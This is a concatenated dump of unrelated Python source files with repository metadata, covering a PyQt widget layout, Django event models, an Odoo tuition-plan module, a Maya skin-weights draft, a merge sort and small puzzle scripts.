sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(rootForm.sizePolicy().hasHeightForWidth())
rootForm.setSizePolicy(sizePolicy)
rootForm.setMinimumSize(QtCore.QSize(50, 0))
rootForm.setBaseSize(QtCore.QSize(50, 126))
rootForm.setStyleSheet("background-color: rgb(71, 58, 46);\n"
"border-color: rgb(207, 207, 207);\n"
"background-color: rgba(71, 65, 60, 180);\n"
"color: rgb(244, 244, 244);\n"
"border-color: rgb(0, 0, 0);")
self.gridLayout = QtWidgets.QGridLayout(rootForm)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setSpacing(0)
self.gridLayout.setObjectName("gridLayout")
self.groupBox = QtWidgets.QGroupBox(rootForm)
self.groupBox.setMinimumSize(QtCore.QSize(50, 0))
self.groupBox.setMaximumSize(QtCore.QSize(160, 160))
self.groupBox.setBaseSize(QtCore.QSize(50, 0))
self.groupBox.setAlignment(QtCore.Qt.AlignHCenter|QtCore.Qt.AlignTop)
self.groupBox.setFlat(False)
self.groupBox.setObjectName("groupBox")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.groupBox)
self.verticalLayout_2.setContentsMargins(2, 0, 2, 4)
self.verticalLayout_2.setSpacing(2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.btnTitle = QtWidgets.QPushButton(self.groupBox)
self.btnTitle.setObjectName("btnTitle")
self.verticalLayout_2.addWidget(self.btnTitle)
self.btnColorButton = ColorButton(self.groupBox)
self.btnColorButton.setEnabled(False)
self.btnColorButton.setMinimumSize(QtCore.QSize(24, 24))
self.btnColorButton.setText("")
self.btnColorButton.setObjectName("btnColorButton")
self.verticalLayout_2.addWidget(self.btnColorButton)
self.chkbtnPlacefield = QtWidgets.QToolButton(self.groupBox)
self.chkbtnPlacefield.setCheckable(True)
self.chkbtnPlacefield.setChecked(False)
self.chkbtnPlacefield.setPopupMode(QtWidgets.QToolButton.DelayedPopup)
self.chkbtnPlacefield.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.chkbtnPlacefield.setObjectName("chkbtnPlacefield")
self.verticalLayout_2.addWidget(self.chkbtnPlacefield)
self.chkbtnSpikes = QtWidgets.QToolButton(self.groupBox)
self.chkbtnSpikes.setCheckable(True)
self.chkbtnSpikes.setChecked(False)
self.chkbtnSpikes.setPopupMode(QtWidgets.QToolButton.DelayedPopup)
self.chkbtnSpikes.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.chkbtnSpikes.setObjectName("chkbtnSpikes")
self.verticalLayout_2.addWidget(self.chkbtnSpikes)
self.gridLayout.addWidget(self.groupBox, 0, 0, 1, 1)
self.retranslateUi(rootForm)
QtCore.QMetaObject.connectSlotsByName(rootForm)
def retranslateUi(self, rootForm):
_translate = QtCore.QCoreApplication.translate
rootForm.setWindowTitle(_translate("rootForm", "Pf"))
self.groupBox.setTitle(_translate("rootForm", "pf[i]"))
self.btnTitle.setText(_translate("rootForm", "pf[i]"))
self.chkbtnPlacefield.setText(_translate("rootForm", "pf"))
self.chkbtnSpikes.setText(_translate("rootForm", "spikes"))
from pyphoplacecellanalysis.External.pyqtgraph.widgets.ColorButton import ColorButton
| [
"CommanderPho@users.noreply.github.com"
] | CommanderPho@users.noreply.github.com |
808fb0d70182870a1da1d6b69365634f2fd9371d | 482cf94a03646d5e6b8d2def92f9d772fce99c3b | /api/models.py | fb6a4367679a0e820a2adf0c442d71bbe0cc59ad | [] | no_license | ahmadalsalama/unitedway | 9933270d0ae3a95460388bb700f6d38c289f4ad9 | 9c7c6e96f3522cf99556cbb34e6dadf7cd4426e5 | refs/heads/master | 2020-12-31T07:20:44.080129 | 2016-04-29T07:28:24 | 2016-04-29T07:28:24 | 57,320,054 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,998 | py | from django.db import models
from datetime import datetime
CATEGORY_CHOICES = ((0, 'Health'), (1, 'Fitness'), (2, 'Social'))
STATUS_CHOICES = ((0, 'Open'), (1, 'Accepted'), (2, 'Declined'))
USER_TYPES = ((True, 'Organizer'), (False, 'User'))
class User(models.Model):
username = models.CharField(max_length=15, primary_key=True) # SSO
name = models.CharField(max_length=30) # First & Last Name
country = models.CharField(max_length=30)
donations = models.IntegerField(default=0)
num_drinks = models.IntegerField(default=0)
email = models.CharField(max_length=30)
is_org = models.BooleanField('organizer', default=False)
def __str__(self):
return "%s (%s)" % (self.name, dict(USER_TYPES)[self.is_org])
class BadgeDB(models.Model):
username = models.CharField(max_length=15) # SSO
name = models.CharField(max_length=30) # First & Last Name
badgeNumber = models.CharField(max_length=20, primary_key=True) #badge number
def __str__(self):
return self.name
# IGNORE
class Task(models.Model):
name = models.CharField(max_length=30)
description = models.CharField(max_length=2500)
category = models.IntegerField(choices=CATEGORY_CHOICES)
def __str__(self):
return "%s (%s)" % (self.name, dict(CATEGORY_CHOICES)[self.category])
class Event(models.Model):
name = models.CharField(max_length=30)
description = models.CharField(max_length=2500)
category = models.IntegerField(choices=CATEGORY_CHOICES)
max_capacity = models.IntegerField()
start_date = models.DateTimeField(default=datetime(datetime.today().year, datetime.today().month, datetime.today().day, 0, 0, 0))
end_date = models.DateTimeField(default=datetime(datetime.today().year, datetime.today().month, datetime.today().day, 0, 0, 0)) # no need
suggested_donation = models.IntegerField()
org = models.ForeignKey(User)
def __str__(self):
return "%s (%s)" % (self.name, dict(CATEGORY_CHOICES)[self.category])
class Comment(models.Model):
owner = models.ForeignKey(User)
event = models.ForeignKey(Event)
comment = models.TextField()
canRemove = models.BooleanField(default=False)
def __str__(self):
return self.owner.name
class Participation(models.Model):
user = models.ForeignKey(User)
event = models.ForeignKey(Event)
has_joined = models.BooleanField(default=False)
has_rsvpd = models.BooleanField(default=False) # RSVP
created = models.DateTimeField(auto_now_add=True) # no need
def __str__(self):
if self.has_joined:
return "%s has joined %s" % (self.user.name, self.event)
return "%s has rsvpd %s" % (self.user.name, self.event)
#IGNORE
class Challenge(models.Model):
creator = models.ForeignKey(User, null=True, related_name='creator')
assignee = models.ForeignKey(User, null=True, related_name='assignee')
task = models.ForeignKey(Task)
status = models.IntegerField(choices=STATUS_CHOICES, default=0)
created = models.DateTimeField(auto_now_add=True)
def __str__(self):
return "%s challenges %s to %s" % (self.creator.name, self.assignee.name, self.task.description.lower()) | [
"ahmad.alsalama@gmail.com"
] | ahmad.alsalama@gmail.com |
110cfbb3db299c2f9febd17eee212eae41611cab | 71ff0591891b63a95e5bd15fbf78f0b7526d5b86 | /week_5/jes_week2.py | 757b68a31f64309f9c6b69f7c6ddcc7606fb2061 | [] | no_license | AlexanderJDupree/CS160 | e38889d3deda885cfd61087f6cf99c01c9ade1e1 | 8bdfd9327fe8195f412f1c11a59314d8a0c31cfe | refs/heads/master | 2021-05-13T19:07:08.540434 | 2019-01-22T21:13:48 | 2019-01-22T21:13:48 | 116,884,013 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | import string
original = "g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc " \
"dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq " \
"rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu " \
"ynnjw ml rfc spj."
url = "http://www.pythonchallenge.com/pc/def/map.html"
table = str.maketrans(
"abcdefghijklmnopqrstuvwxyz", "cdefghijklmnopqrstuvwxyzab"
)
print(url.translate(table))
| [
"Alexander.j.dupree@gmail.com"
] | Alexander.j.dupree@gmail.com |
4cda39ca61d35d116dfa1f795e829856cfa8aa9f | 53fce93304f306a940dd69c0362a39ca21c062ee | /tuition_plan/models/tuition_plan.py | 7ee1d69aaee97cbba24c0987e7a8e616bd8ea8fc | [] | no_license | sgcalle/ew-dev | 07ea4d7cdc6c085e5d44b66f91e6c74ca231cf64 | 94256458addf8e07ef4b29ae025d63dcf35757fb | refs/heads/main | 2023-03-02T08:10:06.390910 | 2021-02-04T13:49:37 | 2021-02-04T13:49:37 | 334,944,264 | 0 | 0 | null | 2021-02-10T15:21:00 | 2021-02-01T12:34:41 | Python | UTF-8 | Python | false | false | 10,222 | py | # -*- coding: utf-8 -*-
from dateutil.relativedelta import relativedelta
from odoo import models, fields, api
from odoo.exceptions import ValidationError
class TuitionPlan(models.Model):
_name = "tuition.plan"
_description = "Tuition Plan"
name = fields.Char(string="Name",
required=True)
active = fields.Boolean(string="Active",
default=True)
period_type = fields.Selection(string="Period Type",
selection=[
("fiscal_year","Fiscal Year"),
("year_after","Year After"),
("manual","Manual")],
default="fiscal_year",
required=True)
reference_date = fields.Date(string="Reference Date",
help="Used to identify the period based on the selected period type")
period_date_from = fields.Date(string="Period Start",
compute="_compute_period_dates",
required=True,
readonly=False,
store=True,
help="Autocomputed based on the selected reference date and period type")
period_date_to = fields.Date(string="Period End",
compute="_compute_period_dates",
required=True,
readonly=False,
store=True,
help="Autocomputed based on the selected reference date and period type")
category_id = fields.Many2one(string="Category",
comodel_name="product.category",
required=True,
domain="[('parent_id','=',False)]",
help="Category of the products included in this tuition plan")
automation = fields.Selection(string="Automation",
selection=[
("quotation", "Create Quotation"),
("sales_order", "Create Sales Order"),
("draft_invoice", "Create Sales Order and Draft Invoice"),
("posted_invoice", "Create Sales Order and Posted Invoice")],
required=True,
default="quotation",
help="Specify what will automatically be created when an installment of this tuition plan is executed")
first_charge_date = fields.Date(string="First Charge Date",
required=True,
help="The first date of the installments")
payment_term_id = fields.Many2one(string="Payment Terms",
comodel_name="account.payment.term",
help="Payment term for the order and/or invoice generated.")
first_due_date = fields.Date(string="First Due Date",
help="Select the day of the due date. Only the day is used. Required if no payment term is set.")
discount_ids = fields.One2many(string="Multi-child Discounts",
comodel_name="tuition.plan.discount",
inverse_name="plan_id",
help="Discounts to apply based on the number of enrolled students in a family. Only enrolled students with the date of birth set is included.")
installment_ids = fields.One2many(string="Installments",
comodel_name="tuition.plan.installment",
inverse_name="plan_id",
help="Installment dates generated for the tuition plan based on the first charge date")
product_ids = fields.One2many(string="Products",
comodel_name="tuition.plan.product",
inverse_name="plan_id",
help="Product to include in the order and/or invoice generated")
company_id = fields.Many2one(string="Company",
comodel_name="res.company",
required=True,
readonly=True,
default=lambda self: self.env.company)
grade_level_ids = fields.Many2many(string="Grade Levels",
comodel_name="school_base.grade_level",
required=True,
help="Grade levels to which this tuition plan applies and to whom it will generate order/invoice for")
analytic_account_id = fields.Many2one(string="Analytic Account",
comodel_name="account.analytic.account")
default = fields.Boolean(string="Default",
help="Specify if this tuition plan should be auto-assigned to students if they don't have any that overlaps with this plan")
partner_ids = fields.Many2many(string="Students",
comodel_name="res.partner",
relation="partner_tuition_plan_rel",
domain="[('grade_level_id','in',grade_level_ids)]",
help="Students to which this tuition plan was manually assigned")
discount_product_id = fields.Many2one(string="Discount Product",
comodel_name="product.product",
help="Product to use when adding multi-child discount lines")
default_partner_ids = fields.Many2many(string="Default Students",
comodel_name="res.partner",
compute="_compute_default_partner_ids")
use_student_payment_term = fields.Boolean(string="Use Student Payment Terms",
help="If checked, the invoice payment terms is taken from the student if any")
report_ids = fields.One2many(string="Report Lines",
comodel_name="tuition.plan.report",
inverse_name="plan_id")
@api.constrains("default", "grade_level_ids", "period_date_from", "period_date_to", "category_id", "active")
def _check_default(self):
for plan in self.filtered(lambda p: p.default):
matched = self.search([
"&", ("id","!=",plan.id),
"&", ("default","=",True),
"&", ("category_id","=",plan.category_id.id),
"&", ("grade_level_ids","in",plan.grade_level_ids.ids),
"|", ("period_date_from","=",plan.period_date_from),
("period_date_to","=",plan.period_date_to)], limit=1)
if matched:
raise ValidationError(
"Unable to set as default. This tuition plan overlaps with %s (ID %d)." % (matched.name, matched.id))
@api.constrains("partner_ids", "grade_level_ids", "period_date_from", "period_date_to", "category_id", "active")
def _check_partner_ids(self):
for plan in self:
plan.partner_ids._check_tuition_plan_ids()
@api.depends("reference_date", "period_type")
def _compute_period_dates(self):
for plan in self:
date_from = False
date_to = False
if plan.reference_date:
if plan.period_type == "fiscal_year":
dates = plan.company_id.compute_fiscalyear_dates(plan.reference_date)
date_from = dates["date_from"]
date_to = dates["date_to"]
if plan.period_type == "year_after":
date_from = plan.reference_date
date_to = date_from + relativedelta(years=1, days=-1)
plan.period_date_from = date_from
plan.period_date_to = date_to
@api.constrains("first_charge_date", "period_date_to")
def _compute_installment_ids(self):
for plan in self:
plan.installment_ids.unlink()
if not plan.first_charge_date:
continue
installment_ids = []
months = 0
installment_date = plan.first_charge_date + relativedelta(months=months)
while installment_date <= plan.period_date_to:
installment_ids.append((0, 0, {
"date": installment_date,
}))
months += 1
installment_date = plan.first_charge_date + relativedelta(months=months)
plan.installment_ids = installment_ids
def get_overlapping_plans(self):
self.ensure_one()
return self.search([
"&", ("category_id","=",self.category_id.id),
"&", ("grade_level_ids","in",self.grade_level_ids.ids),
"!", "|", ("period_date_to","<",self.period_date_from),
("period_date_from",">",self.period_date_to)
])
def _compute_default_partner_ids(self):
for plan in self:
result = []
if plan.default:
students = self.env["res.partner"].search([
("person_type","=","student"),
("tuition_plan_ids","=",False),
("grade_level_id","in",plan.grade_level_ids.ids)
])
result = students.ids
plan.default_partner_ids = result
def action_open_report(self):
self.ensure_one()
action = self.env.ref("tuition_plan.tuition_plan_report_action").read()[0]
context = eval(action["context"])
context.update({
"search_default_plan_id": self.id,
})
action["context"] = context
return action
def action_generate_forecast(self):
report_obj = self.env["tuition.plan.report"]
plan_reports = report_obj.search([("plan_id","in",self.ids)])
plan_reports.unlink()
for plan in self:
record_data = []
for installment in plan.installment_ids:
self._cr.execute("SAVEPOINT tuition_plan_report")
sales = installment.with_context(
override_sale_order_name="For Tuition Plan Report",
automation="quotation").execute()
for sale in sales:
for line in sale.order_line:
record_data.append({
"plan_id": plan.id,
"partner_id": sale.partner_id.id,
"family_id": sale.family_id.id,
"student_id": sale.student_id.id,
"product_id": line.product_id.id,
"price_subtotal": line.price_subtotal,
"price_tax": line.price_tax,
"price_total": line.price_total,
"grade_level_id": sale.student_id.grade_level_id.id,
"currency_id": sale.currency_id.id,
"homeroom": sale.student_id.homeroom,
"date": installment.date,
})
try:
self._cr.execute("ROLLBACK TO SAVEPOINT tuition_plan_report")
self.pool.clear_caches()
self.pool.reset_changes()
except psycopg2.InternalError:
pass
for data in record_data:
report_obj.create(data)
| [
"jaragon@eduwebgroup.com"
] | jaragon@eduwebgroup.com |
8577d6ba440c770c4416e9348d8c2bf56b4753b0 | 74dfc045bf1af3b00307a2324ae5032d4c90e263 | /Day_1_2.py | 6677b2c8f035b5484dbcd9ea9dbc03692bdd9072 | [] | no_license | Moneymet/Advent_of_Code | 0a568ce749139551b940a19933b21e0579c279d7 | d3d09e82e5cb8218bae0fadf821c63361a4254b1 | refs/heads/master | 2023-03-17T17:13:53.656830 | 2021-03-12T07:08:25 | 2021-03-12T07:08:25 | 338,199,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 748 | py | sum_value = 2020
f = open("input_1.txt", "r")
lines = f.read()
expenses_string = lines.split("\n")
expenses = list(map(int, expenses_string))
expenses.sort()
#Finds combination of 3 numbers in a sorted int list adding up to specified sum
def find_sum_multiplied_3(sum_value, expenses):
for x in expenses:
for y in expenses[1:len(expenses)]:
#Skips checking z values if the sum of the first and second number is too high to possibly find a low enough third value
if x + y < sum_value-expenses[0]:
for z in expenses[2:len(expenses)]:
if x+y+z == sum_value:
return x*y*z
multiplied_sum = find_sum_multiplied_3(sum_value, expenses)
print(multiplied_sum) | [
"christergum@hotmail.com"
] | christergum@hotmail.com |
94974769dcfab84dbc8f51212317d59376b13fc7 | 9538c0592428c88c1894e66a1ed74141cf2f5eec | /Homework/03-Python/python-challenge_Raw/PyBank/Main_PyBank_v12.py | 7190909d08af46e8a6c0727fefca53b5bc048cd3 | [] | no_license | domaica/copia-MIA-course | cfcd9fc414448792fda20f7ffc49619b1df39045 | 3e5036a5361100d4d886803a8f6be8a03bedcb21 | refs/heads/main | 2023-05-02T17:23:40.251586 | 2021-06-01T13:47:01 | 2021-06-01T13:47:01 | 368,016,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,226 | py | # First we'll import the os module
# This will allow us to create file paths across operating systems
import os
# Module for reading CSV files
import csv
csvpath = os.path.join('Resources-PyBank/budget_data.csv')
# output_path = os.path.join('Resources-PyBank/budget_new.csv')
with open(csvpath) as csvfile:
# CSV reader specifies delimiter and variable that holds contents
csvreader = csv.reader(csvfile, delimiter=',')
# # Read the header row first (skip this step if there is now header)
csv_header = next(csvreader)
# VARIABLES
num_rows = 0
linetotal = 0
total = 0
avgchange = 0.00
initialvalue = 0
totaldif= 0
delta = 0
current_line = 0
prev_line = 0
maxincrease = 0
maxdecrease = 0
max_month = ''
min_month =''
month = ''
for row in csvreader: # Read each row of data after the header
# antes de cargar el valor de la linea, lo resto porque es el valor anterior menos el de ahora al cambiar la linea
if (row == 0):
current_line = int(row[1])
prev_line = int(row[1])
month = str(row[0])
delta = current_line
maxincrease = delta
max_month = month
else:
current_line = int(row[1])
month = str(row[0])
delta = current_line - prev_line
prev_line = int(row[1])
if (delta >= maxincrease):
maxincrease = delta
max_month = month
elif (delta < maxdecrease):
maxdecrease = delta
min_month = month
# total = total + linetotal
# comparo el incremento o decremento actual con el valor maximo o minimo previamente guardado en la variable
def sum_months(): # function to calculate total number of votes
total_months = 0 # initialize variable total_months
with open(csvpath) as csvfile:
# CSV reader specifies delimiter and variable that holds contents
csvreader = csv.reader(csvfile, delimiter=',')
# Skip header row
csv_header = next(csvreader)
for row in csvreader: # iteration of rows in cvs file
total_months = total_months + 1 # Add 1 to total votes
return total_months
def sum_amount(): # function to calculate total number of votes
total_amount = 0 # initialize variable total
linetotal = 0 # initialize variable linetotal
with open(csvpath) as csvfile:
# CSV reader specifies delimiter and variable that holds contents
csvreader = csv.reader(csvfile, delimiter=',')
# Skip header row
csv_header = next(csvreader)
for row in csvreader: # iteration of rows in cvs file
# linetotal = int(row[1])
total_amount = total_amount + int(row[1])
return total_amount
def avg_change(): # function to calculate total number of votes
total_delta = 0
initialvalue = 0
lastvalue = 0 # initialize variable linetotal
with open(csvpath) as csvfile:
# CSV reader specifies delimiter and variable that holds contents
csvreader = csv.reader(csvfile, delimiter=',')
# Skip header row
csv_header = next(csvreader)
for row in csvreader: # Read each row of data after the header
if initialvalue == 0:
initialvalue = int(row[1])
else:
lastvalue = int(row[1])
total_delta = round(((lastvalue - initialvalue) / (total_months - 1)), 2)
return total_delta
# run functions
total_months = sum_months()
total_amount = sum_amount()
total_delta = avg_change()
print(" ")
print(" ")
print(" Financial Analysis")
# print("__________________________")
print("----------------------------")
print("Total Months: " + str(total_months))
print("Total: " + " $ " + str(total_amount))
# print("Average Change: " + " $ " + str(round(avgchange, 2))
print("Average Change: " + " $ " + str(total_delta))
print("Greatest Increase in Profits: " + str(max_month) + " (" + "$" + str(maxincrease) + ")")
print("Greatest Decrease in Profits: " + str(min_month) + " (" + "$" + str(maxdecrease) + ")")
# print("Greatest Increase in Profits: " + str(month_max) + " $ " + str(maxincrease))
# print("Greatest Decrease in Profits: " + str(month_min) + " $ " + str(maxdecrease))
# Begin write new csv
# output_path = os.path.join('Resources-PyBank/budget_new.csv')
# with open(output_path, 'w') as csvfile:
# csvwriter = csv.writer(csvfile, delimiter=',')
# csvwriter.writerow(['Financial Analysis'])
# csvwriter.writerow(["Total Months", str(total_months)])
# csvwriter.writerow(["Total", str(total)])
# csvwriter.writerow(["Average Change" , str(avgchange)])
# csvwriter.writerow(["Greatest Increase in Profits", str(maxincrease)])
# csvwriter.writerow(["Greatest Decrease in Profits", str(maxdecrease)])
# # with open(output_path, 'w') as csvfile:
# writer = csvwriter('Resources-PyBank/budget_new.csv')
# for row in csvreader(csvfile):
# if any(row):
# writer.writerow(row) | [
"idomaica@gmail.com"
] | idomaica@gmail.com |
d149ffd12f666282ebb099b6e5dfa0372a305fd8 | cd774a87f8e2716a57c282154f856a6ae20d26f1 | /BoostedTauAnalysis/CleanJets/cleanjets_cfg.py | a95496ec96b48c1eb244ffb7f48ce73ee282f768 | [] | no_license | friccita/boosted-tau-analysis | fb59d28989f1d7ee40ecb09d1c7f13cf01e00709 | c62cacabf50df7ba2c513c9af6a14f1b60085ff0 | refs/heads/master | 2021-01-17T10:55:08.115931 | 2015-08-10T09:44:22 | 2015-08-10T09:44:22 | 12,270,483 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,601 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("OWNPARTICLES")
process.load("FWCore.MessageService.MessageLogger_cfi")
process.load("BoostedTauAnalysis.CleanJets.cleanjets_cfi")
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
process.source = cms.Source("PoolSource",
# replace 'myfile.root' with the source file you want to use
fileNames = cms.untracked.vstring(
'file:/data1/yohay/NMSSMHiggs_gg_skim_1000Files.root'
)
)
process.load("SimGeneral.HepPDTESSource.pythiapdt_cfi")
#process.printTree = cms.EDAnalyzer("ParticleTreeDrawer",
# src = cms.InputTag("genParticles"),
# printP4 = cms.untracked.bool(False),
# printPtEtaPhi = cms.untracked.bool(False),
# printVertex = cms.untracked.bool(False),
# printStatus = cms.untracked.bool(True),
# printIndex = cms.untracked.bool(False),
# status = cms.untracked.vint32( 3 )
# )
process.options = cms.untracked.PSet(
SkipEvent = cms.untracked.vstring('ProductNotFound')
)
#process.out = cms.OutputModule("PoolOutputModule",
# fileName = cms.untracked.string('NMSSMHiggs_ZH_skim_PFJetsNoMu.root')
#)
#process.p = cms.Path(process.printTree*process.CleanJets)
process.p = cms.Path(process.CleanJets)
#process.e = cms.EndPath(process.out)
| [
"Rachel.Yohay@cern.ch"
] | Rachel.Yohay@cern.ch |
500ca55d55600422c9796c3e979724c77af12e9d | 56f4456ee15a71c98e834ccf899325973a7624a1 | /django-verdant/archiveit/urls.py | f50a7d5a271cf9c2e640cddde9f1a0abd41f47b3 | [] | no_license | torchbox/verdant-rca | d0a112db74403b36655136f5a42b75960f9fc470 | 93904da6f1e6797d93c63de0d1a29c65545ef1fa | refs/heads/master | 2022-12-14T09:05:40.940426 | 2022-05-26T12:30:41 | 2022-05-26T12:30:41 | 11,999,467 | 12 | 10 | null | 2022-12-08T07:02:23 | 2013-08-09T11:23:11 | Python | UTF-8 | Python | false | false | 143 | py | from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('',
url(r'^(\d+)/$', views.index, name="index"),
)
| [
"noreply@github.com"
] | noreply@github.com |
ed109450dd495417ac223234f1e78a19e41b4190 | 6956291893c1deef10b10e645d18dcacc2819969 | /tpRig/tpSkinWeights.py | 3152f17d514fb22619b12d0cd0b18c03023930db | [] | no_license | thipaulino/tpTools | 19c8bcbd98b1e4d6fc6f015a6f73bd890cedac36 | dbf799eb65b0da0db612b97c9b2bedf0e79bb537 | refs/heads/master | 2023-02-20T04:11:49.767739 | 2023-02-06T10:08:28 | 2023-02-06T10:08:28 | 249,549,932 | 9 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,249 | py | import maya.cmds as cmds
# getting the selection
original_sel = om.MSelectionList()
om.MGlobal.getActiveSelectionList(original_sel)
# getting selected mesh and components
cmds.select(cmds.polyListComponentConversion(toVertex=True))
# get the selected mesh and components
sel = om.MSelectionList()
om.MGlobal.getActiveSelectionList(sel)
if not sel.length():
return
selected_components = om.MObject()
dag = om.MDagPath()
sel.getDagPath(0, dag, selected_components)
dag.extendToShape()
if dag.apiType() != 296:
om.MGlobal.displayError("Selection must be a polygon mesh.")
return
# getting skinclisters name and mobject
def getSkinCluster(self, dag):
"""A convenience function for finding the skinCluster deforming a mesh.
params:
dag (MDagPath): A MDagPath for the mesh we want to investigate.
"""
# useful one-liner for finding a skinCluster on a mesh
skin_cluster = cmds.ls(cmds.listHistory(dag.fullPathName()), type="skinCluster")
if len(skin_cluster) > 0:
# get the MObject for that skinCluster node if there is one
sel = om.MSelectionList()
sel.add(skin_cluster[0])
skin_cluster_obj = om.MObject()
sel.getDependNode(0, skin_cluster_obj)
return skin_cluster[0], skin_cluster_obj
else:
raise RuntimeError("Selected mesh has no skinCluster")
# part something of the post
# doing this can speed up iteration and also allows you to undo all of this
cmds.skinPercent(skin_cluster, pruneWeights=0.005)
mFnSkinCluster = omAnim.MFnSkinCluster(skin_cluster_obj)
inf_objects = om.MDagPathArray()
# returns a list of the DagPaths of the joints affecting the mesh
mFnSkinCluster.influenceObjects(inf_objects)
inf_count_util = om.MScriptUtil(inf_objects.length())
# c++ utility needed for the get/set weights functions
inf_count_ptr = inf_count_util.asUintPtr()
inf_count = inf_count_util.asInt()
influence_indices = om.MIntArray()
# create an MIntArray that just counts from 0 to inf_count
for i in range(0, inf_count):
influence_indices.append(i)
old_weights = om.MDoubleArray()
# don't use the selected_components MObject we made since we want to get the weights for each vertex
# on this mesh, not just the selected one
empty_object = om.MObject()
mFnSkinCluster.getWeights(dag, empty_object, old_weights, inf_count_ptr)
# new_weights just starts as a copy of old_weights
new_weights = om.MDoubleArray(old_weights)
#____________________
# iterate over the selected verts
itVerts = om.MItMeshVertex(dag, selected_components)
while not itVerts.isDone():
this_vert_weight_index = itVerts.index() * inf_count
vert_weights = list(new_weights[this_vert_weight_index: this_vert_weight_index + inf_count])
# makes the weights for the closest vertex equal to the outer vertex
new_weights[this_vert_weight_index: this_vert_weight_index + inf_count] = SOME
AWESOME
FUNCTION
itVerts.next()
# set weights all at once
mFnSkinCluster.setWeights(dag, empty_object, influence_indices, new_weights, True, old_weights)
om.MGlobal.setActiveSelectionList(original_sel)
| [
"tpaulino.com@gmail.com"
] | tpaulino.com@gmail.com |
a6a2cc34a4585bc4cdb06c57d364943c07267440 | 2cbcfb9b9046ac131dc01a6fd048b6920d29cd42 | /排序/归并排序.py | 0cbe99980292db1b81d0c8dee0c1fd456bdca38b | [] | no_license | pulinghao/LeetCode_Python | 6b530a0e491ea302b1160fa73582e838338da3d1 | 82ece6ed353235dcd36face80f5d87df12d56a2c | refs/heads/master | 2022-08-12T21:19:43.510729 | 2022-08-08T03:04:52 | 2022-08-08T03:04:52 | 252,371,954 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,397 | py | #!/usr/bin/env python
# _*_coding:utf-8 _*_
"""
@Time :2020/4/25 4:13 下午
@Author :pulinghao@baidu.com
@File :归并排序.py
@Description :
"""
class Solution(object):
def __init__(self):
self.sortednums = []
self.nums = []
def mergeSort(self, nums):
self.nums = nums
self.sort(0, len(nums) - 1)
return self.nums
pass
def sort(self, left, right):
if left < right:
mid = (left + right) / 2
self.sort(left, mid)
self.sort(mid + 1, right)
self.merge(left, mid, right)
pass
def merge(self, left, mid, right):
self.sortednums = []
i = left
j = mid + 1
while i <= mid and j <= right:
if self.nums[i] < self.nums[j]:
self.sortednums.append(self.nums[i])
i += 1
else:
self.sortednums.append(self.nums[j])
j += 1
while i <= mid:
self.sortednums.append(self.nums[i])
i += 1
while j <= right:
self.sortednums.append(self.nums[j])
j += 1
t = 0
while left <= right:
self.nums[left] = self.sortednums[t]
t += 1
left += 1
pass
if __name__ == '__main__':
print Solution().mergeSort(nums=[5, 4, 3, 2, 1])
| [
"pulinghao@baidu.com"
] | pulinghao@baidu.com |
a9d0bc7546f7ca3723a17a3f5fd7ba086d51f28c | 21bf726bf895569a41a8b8d2db6772dc51f46cfd | /OTHERS/Interviews/Akuna.py | abba9d6a6b4e54cda0048899107ec10a4fa00cc0 | [] | no_license | jeffsnguyen/Python-1 | dd924d25337cd6ac21e321d7b2c5ac17c065d94b | 463d32a61a760d076656c73c9f8c9fadf262438d | refs/heads/master | 2022-03-23T09:50:04.476094 | 2019-12-23T12:32:49 | 2019-12-23T12:32:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,844 | py | def if_none_trivial(x):
if x==0:
return 0
else:
return 1
def violet_search_icecream_shop(stock, max_capacity,demands,n_days,overnight_fee,price,deliver_fee,total_expense=[],expense=0):
delivery_min = max(0,demands[0]-stock)
delivery_max = max(0,sum(demands) - stock)
for delivery in range(delivery_min,delivery_max+1,1):
expense_today = expense + if_none_trivial(delivery)*deliver_fee + delivery*price
expense_today = expense_today + max(0,(stock+delivery-max_capacity))*overnight_fee
stock_next = stock+delivery-demands[0]
print("***********************")
print("expense until yesterday: ",expense)
print("expense until today: ", expense_today)
print(n_days, "remains")
if n_days>1:
violet_search_icecream_shop(stock_next, max_capacity,demands[1:],n_days-1,overnight_fee,price,deliver_fee,total_expense,expense_today)
else:
print("%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%")
print("total expense",expense_today)
total_expense.append(expense_today)
# yield(expense_today)
total_expense=[]
violet_search_icecream_shop(0,10,[1,2,1,4],4,1,3,4,total_expense=total_expense)
print(total_expense)
print("the optimum cost:", min(total_expense))
from collections import defaultdict
def code_preprocessing(delivery_code):
code_dic = defaultdict(list)
i = 0
for code in delivery_code:
crude = code.split('-',1)
code_dic[crude[0]].append((crude[1],i))
i = i+1
print(code_dic)
code_dict = code_preprocessing(["123-2","2345-1","123-3","123-5","2345-5"])
def swarm_delivery(code_dict):
bee = []
for key,value in code_dict:
bee.append(value)
print(bee)
swarm_delivery(code_dict)
| [
"jerryxyx@163.com"
] | jerryxyx@163.com |
969686b5b62be15e63eee3ae8fae86d0e915490d | 13084338fa9d1c72fe32d323bcd2df1417b98e83 | /src/bxcommon/rpc/requests/unsubscribe_rpc_request.py | 54c99f8ba9d6e63606193bafd337205d3b9996b2 | [
"MIT"
